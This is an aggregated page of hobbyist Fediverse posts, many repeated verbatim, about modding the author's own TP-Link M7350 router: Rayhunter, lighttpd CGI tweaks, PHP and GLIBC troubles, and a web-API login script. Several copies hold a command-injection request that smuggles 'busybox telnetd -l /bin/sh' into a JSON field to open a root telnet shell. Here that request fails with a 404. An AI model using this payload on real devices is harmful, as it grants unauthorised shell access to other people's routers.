home.social

#m7350 — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #m7350, aggregated by home.social.

  1. Just deployed the #EFF 's #RayHunter mod to a TPLink #M7350, now i can sniff for IMSI catchers...

  2. Lets write a lil tool,
    so we don't need to use #telnet anymore

    https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser

    And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.

    Without any command line. In the #webbrowser .
    ❤️ Lovely
    Whats that ?
    If you copy in a sh onto your router externalSD ?

    ..
    Sure. added a FixPermission button just for that. :abloblamp:

    I like #CgiBin . Is nice

    (I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )

    #repost •acws #acws #m7350 #tplink
  3. Lets write a lil tool,
    so we don't need to use #telnet anymore

    https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser

    And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.

    Without any command line. In the #webbrowser .
    ❤️ Lovely
    Whats that ?
    If you copy in a sh onto your router externalSD ?

    ..
    Sure. added a FixPermission button just for that. :abloblamp:

    I like #CgiBin . Is nice

    (I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )

    #repost •acws #acws #m7350 #tplink
  4. Lets write a lil tool,
    so we don't need to use #telnet anymore

    https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser

    And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.

    Without any command line. In the #webbrowser .
    ❤️ Lovely
    Whats that ?
    If you copy in a sh onto your router externalSD ?

    ..
    Sure. added a FixPermission button just for that. :abloblamp:

    I like #CgiBin . Is nice

    (I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )

    #repost •acws #acws #m7350 #tplink
  5. Lets write a lil tool,
    so we don't need to use #telnet anymore

    https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser

    And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.

    Without any command line. In the #webbrowser .
    ❤️ Lovely
    Whats that ?
    If you copy in a sh onto your router externalSD ?

    ..
    Sure. added a FixPermission button just for that. :abloblamp:

    I like #CgiBin . Is nice

    (I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )

    #repost •acws #acws #m7350 #tplink
  6. Lets write a lil tool,
    so we don't need to use #telnet anymore

    https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser

    And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.

    Without any command line. In the #webbrowser .
    ❤️ Lovely
    Whats that ?
    If you copy in a sh onto your router externalSD ?

    ..
    Sure. added a FixPermission button just for that. :abloblamp:

    I like #CgiBin . Is nice

    (I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )

    #repost •acws #acws #m7350 #tplink
  7. Well turns out we can do without #php

    Router hates #https connections, so we need to rewrite the entire uptime thing
    (Furthermore -spider https is always retruning 404, but router is on, so yea.)

    https://codeberg.org/alceawisteria/UptimeMonitor/src/branch/main/sh_ver

    But it works.

    Now I only need to figure out how to do #cron .
    And I'm done.


    Guess I'll be writing some customized *sh for it then.
    That was *not* on my 2026 Bingo card.
    (Note to self, check #GLIBC version on future routers, so you know what it can actually run !)


    #repost •acws #acws #m7350 #tplink
  8. Soooo


    ./opt/bin/php-cgi: /opt/lib/libc.so.6: version `GLIBC_2.25' not found (required by ./opt/bin/php-cgi)
    ./opt/bin/php-cgi: /opt/lib/libc.so.6: version `GLIBC_2.27' not found (required by ./opt/bin/php-cgi)
    /media/card/php/test_cgi #
    /media/card/php/test_cgi # cd ..
    /media/card/php #

    even #PHP 7.2.2 requires #GLIBC 2.25/2.27! That means ALL the Entware PHP packages are compiled against newer glibc than your router has (GLIBC 2.18).

    This seems to a case of "How low can you go" :P
    https://bin.entware.net/armv7sf-k3.2/archive/

    I'm not sure trying to install php is worth it then.
    After all, below 7 means that most of the stuff of mine, including the one I want needs to be rewritten.

    Might aswell use #perl or #shell at that point....

    #m7350 #tplink
    #repost •acws #acws
  9. How very.. #odd
    After a slight #lighhttpd change
    ----------------
    server.modules = (
    / # # Uncomment the CGI assignment line
    / # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
    / # grep -n "cgi.assign" /etc/lighttpd.conf
    141: cgi.assign = ( "" => "" )
    144: cgi.assign = ( "" => "" )
    248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
    /
    -------------

    and rebooting the #m7350 now #telnet will not renable again with the script.

    Whats even weirder.

    qcmap_web_cgi throws a 404..
    I'm eternally confused

    We still get a token no problemo, but somehow telnet is now closed and stays ?
    (Why would a router reboot or slight lighttpd change cause this ?)

    Should've enabled #adb while I had the chance haha.

    Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
    And even #perl has issues Ohwell




    C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
    <string>&#58;1&#58; SyntaxWarning&#58; invalid escape sequence '\$'
    404 <?xml version="1.0" encoding="iso-8859-1"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http&#58;//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http&#58;//www.w3.org/1999/xhtml" xml&#58;lang="en" lang="en">
    <head>
    <title>404 - Not Found</title>
    </head>
    <body>
    <h1>404 - Not Found</h1>
    </body>
    </html>






    #repost •acws #acws
  10. How very.. #odd
    After a slight #lighhttpd change
    ----------------
    server.modules = (
    / # # Uncomment the CGI assignment line
    / # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
    / # grep -n "cgi.assign" /etc/lighttpd.conf
    141: cgi.assign = ( "" => "" )
    144: cgi.assign = ( "" => "" )
    248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
    /
    -------------

    and rebooting the #m7350 now #telnet will not renable again with the script.

    Whats even weirder.

    qcmap_web_cgi throws a 404..
    I'm eternally confused

    We still get a token no problemo, but somehow telnet is now closed and stays ?
    (Why would a router reboot or slight lighttpd change cause this ?)

    Should've enabled #adb while I had the chance haha.

    Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
    And even #perl has issues Ohwell




    C&#58;\Users\User>python -c "import requests; r=requests.post('http&#58;//192.168.0.1/qcmap_web_cgi', json={'token'&#58;'WPL3qTwBJ8YSmbz1','module'&#58;'webServer','action'&#58;1,'language'&#58;'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie'&#58;'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
    <string>&#58;1&#58; SyntaxWarning&#58; invalid escape sequence '\$'
    404 <?xml version="1.0" encoding="iso-8859-1"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http&#58;//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http&#58;//www.w3.org/1999/xhtml" xml&#58;lang="en" lang="en">
    <head>
    <title>404 - Not Found</title>
    </head>
    <body>
    <h1>404 - Not Found</h1>
    </body>
    </html>






    #repost •acws #acws
  11. How very.. #odd
    After a slight #lighhttpd change
    ----------------
    server.modules = (
    / # # Uncomment the CGI assignment line
    / # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
    / # grep -n "cgi.assign" /etc/lighttpd.conf
    141: cgi.assign = ( "" => "" )
    144: cgi.assign = ( "" => "" )
    248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
    /
    -------------

    and rebooting the #m7350 now #telnet will not renable again with the script.

    Whats even weirder.

    qcmap_web_cgi throws a 404..
    I'm eternally confused

    We still get a token no problemo, but somehow telnet is now closed and stays ?
    (Why would a router reboot or slight lighttpd change cause this ?)

    Should've enabled #adb while I had the chance haha.

    Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
    And even #perl has issues Ohwell




    C&#58;\Users\User>python -c "import requests; r=requests.post('http&#58;//192.168.0.1/qcmap_web_cgi', json={'token'&#58;'WPL3qTwBJ8YSmbz1','module'&#58;'webServer','action'&#58;1,'language'&#58;'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie'&#58;'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
    <string>&#58;1&#58; SyntaxWarning&#58; invalid escape sequence '\$'
    404 <?xml version="1.0" encoding="iso-8859-1"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http&#58;//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http&#58;//www.w3.org/1999/xhtml" xml&#58;lang="en" lang="en">
    <head>
    <title>404 - Not Found</title>
    </head>
    <body>
    <h1>404 - Not Found</h1>
    </body>
    </html>






    #repost •acws #acws
  12. How very.. #odd
    After a slight #lighhttpd change
    ----------------
    server.modules = (
    / # # Uncomment the CGI assignment line
    / # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
    / # grep -n "cgi.assign" /etc/lighttpd.conf
    141: cgi.assign = ( "" => "" )
    144: cgi.assign = ( "" => "" )
    248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
    /
    -------------

    and rebooting the #m7350 now #telnet will not renable again with the script.

    Whats even weirder.

    qcmap_web_cgi throws a 404..
    I'm eternally confused

    We still get a token no problemo, but somehow telnet is now closed and stays ?
    (Why would a router reboot or slight lighttpd change cause this ?)

    Should've enabled #adb while I had the chance haha.

    Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
    And even #perl has issues Ohwell




    C&#58;\Users\User>python -c "import requests; r=requests.post('http&#58;//192.168.0.1/qcmap_web_cgi', json={'token'&#58;'WPL3qTwBJ8YSmbz1','module'&#58;'webServer','action'&#58;1,'language'&#58;'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie'&#58;'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
    <string>&#58;1&#58; SyntaxWarning&#58; invalid escape sequence '\$'
    404 <?xml version="1.0" encoding="iso-8859-1"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http&#58;//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http&#58;//www.w3.org/1999/xhtml" xml&#58;lang="en" lang="en">
    <head>
    <title>404 - Not Found</title>
    </head>
    <body>
    <h1>404 - Not Found</h1>
    </body>
    </html>






    #repost •acws #acws
  13. How very.. #odd
    After a slight #lighhttpd change
    ----------------
    server.modules = (
    / # # Uncomment the CGI assignment line
    / # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
    / # grep -n "cgi.assign" /etc/lighttpd.conf
    141: cgi.assign = ( "" => "" )
    144: cgi.assign = ( "" => "" )
    248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
    /
    -------------

    and rebooting the #m7350 now #telnet will not renable again with the script.

    Whats even weirder.

    qcmap_web_cgi throws a 404..
    I'm eternally confused

    We still get a token no problemo, but somehow telnet is now closed and stays ?
    (Why would a router reboot or slight lighttpd change cause this ?)

    Should've enabled #adb while I had the chance haha.

    Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
    And even #perl has issues Ohwell




    C&#58;\Users\User>python -c "import requests; r=requests.post('http&#58;//192.168.0.1/qcmap_web_cgi', json={'token'&#58;'WPL3qTwBJ8YSmbz1','module'&#58;'webServer','action'&#58;1,'language'&#58;'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie'&#58;'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
    <string>&#58;1&#58; SyntaxWarning&#58; invalid escape sequence '\$'
    404 <?xml version="1.0" encoding="iso-8859-1"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http&#58;//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http&#58;//www.w3.org/1999/xhtml" xml&#58;lang="en" lang="en">
    <head>
    <title>404 - Not Found</title>
    </head>
    <body>
    <h1>404 - Not Found</h1>
    </body>
    </html>






    #repost •acws #acws
  14. So you are trying to tell me that noone bothered to archive these #entware files
    1592
    phodav_2.5-1_armv7-3.2.ipk 18-Apr-2021 13:23 28453
    php7-cgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1507945
    php7-cli_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1527762
    php7-fastcgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 786
    php7-fpm_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1562752
    php7-mod-bcmath_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 12214
    php7-mod-calendar_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 10578
    php7-mod-ctype_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 3104
    php7-mod-curl_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 33116
    php7-mod-dom_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 45322
    php7-mod-exif_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 27343
    php7-mod-fileinfo_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 401782
    php7-mod-filter_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 15741
    php7-mod-ftp_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 17577
    php7-mod-gd_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 26089
    php7-mod-gettext_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 4391


    and now they are Gone ???

    What is the #IT community even doing anyways ?
    https://web.archive.org/web/20210613113743/https://bin.entware.net/armv7sf-k3.2/

    Now I can't get a 2.2.7 GLIBC to be able to use #php 8


    And I cannot get a #php7 which might just be compatible with my old one as there is no backup on da whole. wide. web

    A
    Ma
    Zing.


    :blobcatnotlike:

    #repost •acws #acws #m7350 #tplink
  15. Looks like #M7350 s GLIBC_2.25 is not compatible with #php 8 hmmmmmm


    #repost •acws #acws
  16. Hmm finding a proper #php bin for the #m7350 is not easy.

    It can already run #wget and #perl so that is something.

  17. Hmm so thats what the #M7350 looks like on the inside


    :blobaww:

    #repost •acws #acws #tplink
  18. @m0veax

    👀...

    Thats exactly how I recall it going last time too.
    Always {result 1}

    But telnet remains "conn err"

    Maybe 5.2 does something differen ?

    (It looks like you could even try this without SH and instead use a local html file and try from there, injecting the command, but same result. No telnet - yet)
    #tplink #m7350

    If there was a debug version or something...

  19. Talking with people about ma lil #router .

    Exciting :ablobcatbongo:
    #m7350 #tplink
  20. Say hello to "The #Internetbucket"

    My best invention yet :ablobcatrave:
    - @dr_muesli


    It Fills with Overuse instead of emptying
    https://codepen.io/ryedai1/pen/NPrGXxK

    Its still very .. erm un bucket like..
    Désolé
    But the data is updated automagically.

    :abloblamp:


    (The fetch php is amended to my #M7350 so if you have a different you'd need to get your own

    To commemorate this:

    Re: https://infosec.exchange/@alcea/115791774641598327
    #repost •acws #acws #CodeAlcea

    Protip: Add a "?animate" or perhaps even a "speed=1" for extra #coolness :blobcatthinkingsmirk:
  21. Say hello to "The #Internetbucket"

    My best invention yet :ablobcatrave:
    - @dr_muesli


    It Fills with Overuse instead of emptying
    https://codepen.io/ryedai1/pen/NPrGXxK

    Its still very .. erm un bucket like..
    Désolé
    But the data is updated automagically.

    :abloblamp:


    (The fetch php is amended to my #M7350 so if you have a different you'd need to get your own


    Re: https://infosec.exchange/@alcea/115791774641598327
    #repost •acws #acws #CodeAlcea

    Protip: Add a "?animate" or perhaps even a "speed=1" for extra #coolness :blobcatthinkingsmirk:

    To commemorate this:
  22. Say hello to "The #Internetbucket"

    My best invention yet :ablobcatrave:
    - @dr_muesli


    It Fills with Overuse instead of emptying
    https://codepen.io/ryedai1/pen/NPrGXxK

    Its still very .. erm un bucket like..
    Désolé
    But the data is updated automagically.

    :abloblamp:


    (The fetch php is amended to my #M7350 so if you have a different you'd need to get your own


    Re: https://infosec.exchange/@alcea/115791774641598327
    #repost •acws #acws #CodeAlcea

    Protip: Add a "?animate" or perhaps even a "speed=1" for extra #coolness :blobcatthinkingsmirk:

    To commemorate this:
  23. Say hello to "The #Internetbucket"

    My best invention yet :ablobcatrave:
    - @dr_muesli


    It Fills with Overuse instead of emptying
    https://codepen.io/ryedai1/pen/NPrGXxK

    Its still very .. erm un bucket like..
    Désolé
    But the data is updated automagically.

    :abloblamp:


    (The fetch php is amended to my #M7350 so if you have a different you'd need to get your own

    To commemorate this:

    Re: https://infosec.exchange/@alcea/115791774641598327
    #repost •acws #acws #CodeAlcea

    Protip: Add a "?animate" or perhaps even a "speed=1" for extra #coolness :blobcatthinkingsmirk:
  24. @m0veax

    Regarding #Tplink #m7350
    I had some trouble getting #telnet to work.
    I surmise my m7350 is a v10 and perhaps that could cause difficulties.

    The tl;dr is:
    I want telnet so i can instruct it to run a #php server on boot to let small progs run on boot while keeping the rest of the routers capabilities intact.

    I'm not interested in downright fw replacement.

    What is the workflow for that/ what tools are best used ?

  25. And that is the story of how I got my #router to tell me its inner deepest #microSD secrets :ablobcatrave: :abloblamp:


    #!/bin/bash
    HOST="192.168.0.1"

    # 1. Get Nonce
    NONCE_RESPONSE=$(curl -s -X POST -d '{"module":"authenticator","action":0}' "http://$HOST/cgi-bin/auth_cgi")
    NONCE=$(echo "$NONCE_RESPONSE" | sed -n 's/.*"nonce":[[:space:]]*"\([^"]*\)".*/\1/p')

    # 2. Login
    read -s -p "Enter Admin Password: " PASSWORD
    echo >&2
    DIGEST=$(echo -n "${PASSWORD}:${NONCE}" | md5sum | cut -d' ' -f1)

    LOGIN_RESPONSE=$(curl -s -X POST -d "{\"module\":\"authenticator\",\"action\":1,\"digest\":\"$DIGEST\"}" "http://$HOST/cgi-bin/auth_cgi")
    TOKEN=$(echo "$LOGIN_RESPONSE" | sed -n 's/.*"token":[[:space:]]*"\([^"]*\)".*/\1/p')

    if [ -z "$TOKEN" ]; then echo "Login failed"; exit 1; fi

    # 3. Fetch Status
    FULL_DATA=$(curl -s -X POST \
    -H "Cookie: tpweb_token=$TOKEN" \
    -d "{\"token\":\"$TOKEN\",\"module\":\"status\",\"action\":0}" \
    "http://$HOST/cgi-bin/web_cgi")

    # 4. Parse with KB to GB Math (1024 * 1024)
    echo "$FULL_DATA" | tr -d '"{}' | tr '\t' ' ' | tr ',' '\n' | awk -F: '
    { gsub(/^[ \t]+|[ \t]+$/, "", $1); gsub(/^[ \t]+|[ \t]+$/, "", $2); }

    $1 == "model" { model=$2 }
    $1 == "ipv4" { ip=$2 }
    $1 == "voltage" { bat=$2 }
    $1 == "status" { st=($2==1?"Ready":"Empty") }

    # Logic: Values are in KB. Divide by 1048576 (1024*1024) to get GB.
    $1 == "volume" { vol=$2/1048576 }
    $1 == "used" { usd=$2/1048576 }
    $1 == "left" { lft=$2/1048576 }

    END {
    printf "\n=== DEVICE: %s ===\n", model
    printf "IP Address: %s\n", ip
    printf "Battery: %s%%\n", bat
    printf "---------------------------\n"
    if (vol > 0) {
    printf "SD Status: %s\n", st
    printf "Total Size: %.2f GB\n", vol
    printf "Used Space: %.2f GB (%.1f%%)\n", usd, (usd/vol)*100
    printf "Free Space: %.2f GB\n", lft
    } else {
    print "SD Card: Not Found or Unmounted"
    }
    }
    '
    echo "Done."
    read -n1 -r -p "Press any key to exit..."



    And here I thought I would have to use ftp to fail my way to an answer
    (But as the official apk had better info...

    #Selenium ftw.
    All it takes is running a recorder browser session and poking around in the right place on the webinterface. Wrote a #syslog viewer too while at it.

    #CodeAlcea #m7350 #sdcard #tplink #Cea


    #repost •acws #acws
  26. And that is the story of how I got my #router to tell me its inner deepest #microSD secrets :ablobcatrave: :abloblamp:


    #!/bin/bash
    HOST="192.168.0.1"

    # 1. Get Nonce
    NONCE_RESPONSE=$(curl -s -X POST -d '{"module":"authenticator","action":0}' "http://$HOST/cgi-bin/auth_cgi")
    NONCE=$(echo "$NONCE_RESPONSE" | sed -n 's/.*"nonce":[[:space:]]*"\([^"]*\)".*/\1/p')

    # 2. Login
    read -s -p "Enter Admin Password: " PASSWORD
    echo >&2
    DIGEST=$(echo -n "${PASSWORD}:${NONCE}" | md5sum | cut -d' ' -f1)

    LOGIN_RESPONSE=$(curl -s -X POST -d "{\"module\":\"authenticator\",\"action\":1,\"digest\":\"$DIGEST\"}" "http://$HOST/cgi-bin/auth_cgi")
    TOKEN=$(echo "$LOGIN_RESPONSE" | sed -n 's/.*"token":[[:space:]]*"\([^"]*\)".*/\1/p')

    if [ -z "$TOKEN" ]; then echo "Login failed"; exit 1; fi

    # 3. Fetch Status
    FULL_DATA=$(curl -s -X POST \
    -H "Cookie: tpweb_token=$TOKEN" \
    -d "{\"token\":\"$TOKEN\",\"module\":\"status\",\"action\":0}" \
    "http://$HOST/cgi-bin/web_cgi")

    # 4. Parse with KB to GB Math (1024 * 1024)
    echo "$FULL_DATA" | tr -d '"{}' | tr '\t' ' ' | tr ',' '\n' | awk -F: '
    { gsub(/^[ \t]+|[ \t]+$/, "", $1); gsub(/^[ \t]+|[ \t]+$/, "", $2); }

    $1 == "model" { model=$2 }
    $1 == "ipv4" { ip=$2 }
    $1 == "voltage" { bat=$2 }
    $1 == "status" { st=($2==1?"Ready":"Empty") }

    # Logic: Values are in KB. Divide by 1048576 (1024*1024) to get GB.
    $1 == "volume" { vol=$2/1048576 }
    $1 == "used" { usd=$2/1048576 }
    $1 == "left" { lft=$2/1048576 }

    END {
    printf "\n=== DEVICE: %s ===\n", model
    printf "IP Address: %s\n", ip
    printf "Battery: %s%%\n", bat
    printf "---------------------------\n"
    if (vol > 0) {
    printf "SD Status: %s\n", st
    printf "Total Size: %.2f GB\n", vol
    printf "Used Space: %.2f GB (%.1f%%)\n", usd, (usd/vol)*100
    printf "Free Space: %.2f GB\n", lft
    } else {
    print "SD Card: Not Found or Unmounted"
    }
    }
    '
    echo "Done."
    read -n1 -r -p "Press any key to exit..."



    And here I thought I would have to use ftp to fail my way to an answer
    (But as the official apk had better info...

    #Selenium ftw.
    All it takes is running a recorder browser session and poking around in the right place on the webinterface. Wrote a #syslog viewer too while at it.

    #CodeAlcea #m7350 #sdcard #tplink #Cea


    #repost •acws #acws
  27. Say what you will about #Deepseek , but for #hacking it can be useful.

    It is quite dumb and you have to hand hold it a bit, but..


    #Selenium + #API call reverse engineering and I can login to my dumb #TPLink router via #sh now.

    I wonder if I could reboot it from shell or even read out its microSD capacity left...
    Hmmmm......


    I don't see much else use for #AI tho tbh.
    #Art ? Get outta here.
    #Movies ? Get lost.
    #Cloning #Voice actors and deprive them of their living ? Are you lost ?

    Anyways.
    It is always the same with humans misusing tools ...
    At least this is now abit more useful than my past attempts especially as dumb #TPLink closed #telnet in that latest update.

    I'll hack this thing to bits if I must... :angry_cirno:

    (Altho the thing I wanted the most. Accessing #sftp from #webbrowser via a simple php is already possible... )


    I mean I feel sorry for the people who think #ArtificialIntelligence (emphasis on artificial) is #coding or anything near it.
    I started with js and ahk in like 2007. Added #php when js needed handholding and only arrived at #python when a companies security guidelines barred #ahk (as keylogger lol)
    So yeah.

    But poor people.. Poor pooor people.

    And I do catch myself sometimes thinking "yeah lets toss this trash into multiple LLMs to see what they get.
    Sometimes I bounce the ideas between them or restart sessions as sometimes they have ideas you can't finde with #searchengines.

    Imo LLMs are search engines.
    Nothing more. Nothing less.
    Very dumb, but vast in data.


    #repost •acws #acws #M7350
  28. @polyfloyd •acws #acws

    ah jelly !
    Any device free'd from its shackles is a #win

    I couldn't get #Telnet enabled on my #m7350 #tplink

    It is so stubborn
    :ablobcatgrumpy:

    All in all custom #cfw are only feasable if a community exists..
    pentestpartners.com/security-b
    (the route outlined here has been patched)
    github.com/m0veax/rayhunter-tp github.com/m0veax/tplink_m7350

    Shame #OpenWRT d have been nice

    Wonder what #Lidl would think 😂